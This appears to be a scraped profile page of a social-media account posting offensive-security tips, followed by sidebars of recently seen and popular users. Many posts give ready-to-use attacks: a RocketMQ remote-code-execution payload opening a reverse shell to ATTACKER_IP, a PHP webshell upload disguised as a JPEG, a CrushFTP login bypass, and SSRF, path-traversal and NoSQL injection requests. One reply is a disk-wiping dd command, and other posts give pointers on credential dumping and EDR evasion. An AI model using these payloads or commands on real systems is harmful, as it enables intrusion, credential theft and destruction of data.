Olivia
Online
Parth Patel
@TheDarkSideOps
𓆦 Exploiting Protocols
🕷🕸️
Joined May 2011
2.6K Following
476 Followers
232 Posts
@Polymarket “First Canadian” headline aside, this is really about Canada stepping into deep space ops. Artemis II isn’t just a moon trip, it’s the supply chain, robotics, and long-term presence play, and Canada just locked a seat at that table.🍁
@Burp_Suite The hardest result to justify is “nothing broke” because resilience leaves no fingerprints..
@0xTib3rius A crawler zero-day is running at the crust level.
@SecurityTrybe sudo dd if=/dev/zero of=/dev/sda bs=1G
Who to follow
hack3dBYghost
@mi_jankowski
Eat
Sleep
Cybersecurity
Another day of life, another day of learning. Battling myself for consistency, proving to myself that I can.
Ariel Garcia 
@Arl_rose
Community Builder. Pentester. Bug bounty Hunter. Bug bounty village @ DEFCON. https://t.co/PojmVAcqXQ
Tweets are my own and not the views of my employer.
Hossam Agwa
@Hossam2357
PenTester & Bug Hunter
Drop a `Referer: https://t.co/1WqAEJ56R6` header on a 403 page and watch misconfigured CDN rules open the door. Never trusting a status code.
#bugbounty #websecurity #appsec
@0xTib3rius Long methods are fun until you embed one after a 0 length chunk in a https://t.co/vpsY0PhvMx desync. Frontend closes, backend sees a second request. Combine with X HTTP Method Override and a forged OPTIONS to poison upstream cache.
Elegant chaos from broken protocol logic.
@InterestingSTEM Division by zero is illegal☠️
LSASS isn’t dead, it’s just hiding in plain sight. Dumping creds? Sure. But try watching the process tree *after* a user logs into a mapped drive via SMB. Sometimes the juiciest tokens don’t spawn where you expect. #RedTeam #PostExploitation #WindowsInternals
`GET /vulnerable/api/lookup?domain=https://t.co/sPtuzSQvkN%0AHost:internal.service.local HTTP/1.1` — SSRF pivot via newline injection to hit internal hosts behind weak filtering. #bugbounty #infosec #ssrf #websecurity #offsec
CrushFTP 11.1.0–11.1.2 (CVE-2025-31161) allows unauthenticated HTTP Authorization spoofing. Send `Authorization: Basic <base64("crushadmin:")>` to bypass login and gain admin access. No creds needed. #CVE #ExploitDev #RedTeam #Infosec
If the WAF blocks `../../etc/passwd`, try `..%2f..%2fetc/passwd`, then `..;/..;/etc/passwd`, then chunked transfer encoding. Some devs patch one hole and call it a moat. #bugbounty #websecurity #infosec #pentest
You don’t need a 0-day when the helpdesk still resets passwords over the phone and logs into RDP with domain admin to “check something.”
#RedTeam #OPSEC #ActiveDirectory #InfoSec #CyberSecurity
`POST /profile/img/upload.php` with `Content-Type: image/jpeg` but body = `<?php system($_GET['cmd']); ?>` bypasses extension filter via `.jpg`, hits `/uploads/tmp/xyz.jpg` — drop webshell with `cmd=whoami` and escalate. #bugbounty #webhacking #infosec #appsec
Apache RocketMQ < 5.1.1 (CVE-2023-33246) RCE via updateConfig: send crafted HTTP POST to `/api/v1/config/broker` with `{'brokerConfig':{'rocketmqHome':'$(bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1)'}}` — no auth needed if console exposed. #CVE #ExploitDev #RedTeam
`?redirect=https://<domain>.com` still working on apps that sanitize `<script>` but ignore URL params. Bonus: stash a payload at that URL and serve dynamic JS. Client-side filters won’t see it coming. #websecurity #bugbounty #xss
Most EDRs trust anything signed by Microsoft. So do sysadmins. So does your SOC. Spoof trust, live in memory, and watch the blue team chase their own tail. #EDRevasion #RedTeam #Infosec #WindowsInternals
`GET /api/v1/users?sort_by[$ne]=email HTTP/1.1` — bypasses blacklist-based filters on NoSQL injection in Express/Mongo apps. Returns full user dump if dev forgot to sanitize query param keys. #bugbounty #websecurity #infosec #hacking #offensivesecurity
Most miss this: LDAPDomainDump + BloodHound reveals misconfigured GPOs allowing unprivileged users to edit scripts on SYSVOL. Pivot that to DC compromise without triggering EDR. Perfect for stealth escalation in noisy environments. #RedTeam #ToolDrop #PostExploitation
Last Seen Users on Sotwe
Canlı Yayın İFŞA
Seen from Turkey
yaşlı karı hastası
Seen from Turkey
مجرم حرب 6
Seen from Saudi Arabia
🐆
Seen from Turkey
KADININ KÏLOSU YASI DEĞIL GÜLÜŞÜ ÖNEMLIDIR
Seen from Turkey
CUCKOLD TEK ERKEK 💋
Seen from Turkey
تيرابوكس مجانا مقاطع عربي سوبر لايف تانجو لايف ter
Seen from Egypt
ɢɪɴɴʏ💫
Seen from Italy
Public Gay Sex
Seen from United States
イカリス
Seen from Portugal
Trends for you
Most Popular Users
Elon Musk
@elonmusk
240.1M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
108.8M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.2M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.5M followers
KATY PERRY
@katyperry
86.7M followers
Taylor Swift
@taylorswift13
80.5M followers
Lady Gaga
@ladygaga
72.1M followers
Kim Kardashian
@kimkardashian
69.3M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.4M followers
Bill Gates
@billgates
63.4M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
60.9M followers
X
@x
60.9M followers
CNN Breaking News
@cnnbrk
59.9M followers